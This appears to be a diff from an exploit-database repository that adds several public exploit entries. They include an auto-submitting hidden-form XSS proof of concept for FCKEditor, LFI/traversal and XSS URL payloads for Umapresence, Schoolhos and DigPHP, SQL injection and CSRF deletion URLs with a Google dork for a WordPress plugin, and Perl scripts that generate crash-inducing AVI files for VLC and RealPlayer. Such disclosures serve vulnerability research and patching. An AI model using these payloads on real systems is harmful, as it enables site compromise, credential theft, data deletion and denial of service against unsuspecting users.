+57  com.apple.WebKit.WebContent   	0x0000000103f10b40 0x103f10000 + 2880
+58  libdyld.dylib                 	0x00007fff873e45c9 start + 1
+*/
+?>

platforms/php/webapps/37457.html

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54188/info
+
+FCKEditor is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FCKEditor 2.6.7 is vulnerable; prior versions may also be affected. 
+
+html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
+

platforms/php/webapps/37459.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54194/info
+
+Umapresence is prone to a local file-include vulnerability and an arbitrary file-deletion vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit a local file-include vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Attackers can exploit an arbitrary file-deletion vulnerability with directory-traversal strings ('../') to delete arbitrary files; this may aid in launching further attacks.
+
+Umapresence 2.6.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/umapresence/umaservices/uma_editor/inc/insert_doc.pop.php?dos=../../style 

platforms/php/webapps/37460.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54204/info
+
+Schoolhos CMS is prone to an arbitrary file-upload vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could exploit these issues to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server.
+
+Schoolhos CMS 2.29 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/schoolhos/index.php?p=detberita&id=xxx [XSS] 

platforms/php/webapps/37461.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54207/info
+
+DigPHP is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks. 
+
+http://www.example.com/dig.php?action=file&dir= 

platforms/php/webapps/37464.txt

@@ -0,0 +1,56 @@
+# Exploit Title: Albo Pretorio Online 3.2 Multiple Vulnerabilities
+# Google Dork: inurl:/?action=visatto
+# Date: 09/06/2015
+# Exploit Author: Alessandro Cingolani
+# Vendor Homepage: http://plugin.sisviluppo.info/
+# Software Link: https://downloads.wordpress.org/plugin/albo-pretorio-on-line.3.2.zip
+# Version: 3.2
+# Tested on: Firefox on Ubuntu 64 bit
+
+==============
+Introduction
+==============
+Albo Pretorio Online is a simple wordpress plugin that allows to manage an official bulletin board (albo). For an Italian law publishing an albo on institutional sites become compulsory in 2009. This made the plugin very popular in the institutional enviroment due to the fact that it is the only one present in the official channels. The plugin suffers from an unauthenticated SQL Injection and other various authenticated vulnerabilities, such as XSS and CSRF. In fact the back-end does not sanitize any input/output, so many vulnerabilities are present.
+
+=============
+Front-End
+=============	
+SQL Injection :
+	http://victim.com/albo-folder/?action=visatto&id=[Inject Here]
+============
+Back-End
+============
+
+In the back-end, no protection against SQL Injection, XSS and CSRF exists. This are just few examples
+
+Blind SQL-Injection
+====================
+	http://victim.com/wp-admin/admin.php?page=responsabili&action=edit&id=[Inject Here]
+	http://victim.com/wp-admin/admin.php?page=atti&action=view-atto&id=[Inject Here]
+
+CSRF
+=====
+
+In the back-end, the item deletion is not protected, so any element (acts, responsibles, etc.) could be deleted.
+
+POC:
+
+Responsible deletion 
+	http://victim.com/wp/wp-admin/admin.php?page=responsabili&action=delete-responsabile&id=***responsabile's id***
+Act deletion
+	http://victim.com/wp/wp-admin/admin.php?page=atti&action=annulla-atto&id=***atto's id***
+		
+
+Stored XSS
+===========
+This plugin does not sanitize any output so each form input, except email, is vulnerable to stored XSS.
+
+
+Also some Reflected XSS and a possible Shell Uploading vulnerabilities were discovered and fixed.
+
+Timeline
+=========
+9/06/2015 	- Vulnerabilities found. Developer Informed
+17/06/2015	- Patch Relased (Version 3.3)
+02/07/2015	- Exploit disclosed
+

platforms/windows/dos/37462.pl

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/54208/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. 
+
+#!/usr/bin/perl
+my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
+my $d = "\x41" x 500429 ;
+
+
+my $file = "dark.avi";
+
+open ($File, ">$file");
+print $File $h,$d;
+close ($File);

platforms/windows/dos/37463.pl

@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/54220/info
+
+Real Networks RealPlayer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.
+
+RealPlayer 10 Gold is vulnerable; other versions may also be affected. 
+
+#------------------------------------------------------------------------#
+#                                                                        #
+#                     Usage : perl realplayer.pl                         #
+#                                                                        #
+#------------------------------------------------------------------------#
+
+my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 
+\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
+\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 
+\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e 
+\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 
+\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 
+\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 
+\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 
+\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad 
+\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
+\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff"; 
+
+
+#[Disassembly] 
+#"\x0C\x20\x87\x74"               PUSH EBX
+#"\x0D\x20\x87\x74"               MOV EAX,DWORD PTR SS:[EBP+8]
+#"\x10\x20\x87\x74"               MOV EBX,DWORD PTR SS:[EBP+C]
+#"\x13\x20\x87\x74"               MOV ECX,DWORD PTR SS:[EBP+10]
+#"\x16\x20\x87\x74"               MUL EBX
+#"\x18\x20\x87\x74"               MOV EBX,ECX
+#"\x1A\x20\x87\x74"               SHR EBX,1
+#"\x1C\x20\x87\x74"               ADD EAX,EBX
+#"\x1E\x20\x87\x74"               ADC EDX,0
+#"\x21\x20\x87\x74"               DIV ECX <<---- As we see we can't devise by Zero .So this occurs an error and the program crashes here .
+
+#[Registers]
+#EAX 00000000
+#ECX 00000000
+#EDX 00000000
+#EBX 00000000
+
+# error : Integer Division by Zero ---> Exception handling vulnerability .
+
+# This Exception handling can lead to a DOS attack . However The Concept of using this vulnerability is the create an exception so the program crashes.And it's a local exploit .
+
+
+
+
+my $file = "exploit.avi";
+
+open ($File, ">$file");
+print $File $h;
+close ($File);
+print "0/// Exploit By Dark-Puzzle !                  \n";
+print "1/// Follow me : http://fb.me/dark.puzzle      \n";
+print "0/// avi file Created Enjoy!                   \n";
+print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy\n";
+
+# End Of Exploit 
+#--------------------